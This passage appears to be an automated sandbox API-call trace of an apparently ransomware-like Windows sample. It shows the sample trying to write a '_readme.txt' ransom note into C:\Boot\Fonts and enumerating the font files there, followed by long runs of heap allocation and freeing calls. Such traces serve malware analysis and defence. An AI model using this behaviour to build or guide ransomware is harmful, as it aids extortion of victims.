ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0209.687] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32da538 [0209.687] CreateFileW (lpFileName="C:\\Boot\\Fonts\\_readme.txt" (normalized: "c:\\boot\\fonts\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.687] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32da538 | out: hHeap=0x750000) returned 1 [0209.687] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a87060 | out: hHeap=0x750000) returned 1 [0209.687] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.687] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.687] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.688] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.688] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.688] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0209.688] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0209.688] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0209.688] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0209.688] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0209.688] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0209.688] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.688] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.688] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286440 | out: hHeap=0x750000) returned 1 [0209.688] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286440 [0209.688] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.688] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.688] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.688] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.688] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.688] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.688] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.688] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.688] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.689] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.689] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.689] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.689] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.689] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.689] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.689] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.689] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.689] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.689] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.689] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.689] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.689] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.689] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.689] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.689] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.689] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.689] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.689] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.689] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.689] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.689] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.689] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.689] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.689] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.689] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.689] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.689] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.690] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.690] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.690] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.690] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.690] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.690] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.690] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.690] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.690] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.690] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.690] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.690] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.690] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.690] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.690] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.690] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.690] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.690] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.690] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.690] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.690] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.690] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.690] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.690] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.690] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.690] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.690] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.691] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.691] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.691] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.691] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.691] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.691] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.691] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.691] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.691] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.691] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.691] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.691] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.691] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.691] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.691] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.691] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.691] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.691] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.691] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.691] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.691] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.691] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.691] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.691] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.691] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.692] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.692] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.692] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.692] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.692] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.692] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.692] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.692] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.692] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.692] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.692] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.692] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.692] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.692] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.692] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.692] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.692] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.692] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.692] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.692] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.692] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.692] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.692] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.693] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.693] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.693] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.693] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.693] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.693] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.693] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.693] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.693] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.693] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.693] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.693] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.693] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.693] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.693] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.693] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.693] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.693] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.693] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.693] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.693] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.693] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.694] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.694] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.694] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.694] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.694] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.694] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.694] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.694] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.694] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.694] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.694] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.694] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.694] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.694] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.694] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.694] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.694] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.694] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.694] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.694] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.694] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.694] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.694] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.695] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.695] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.695] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.695] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.695] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.695] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.695] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.695] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.695] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.695] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.695] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.695] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.695] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.695] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.695] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.695] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.695] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.695] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.695] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.695] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.695] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.695] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.695] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.695] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.696] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.696] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.696] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.696] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.696] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.696] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.696] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.696] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.696] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.696] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.696] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.696] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.696] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.696] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.696] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.696] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.696] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 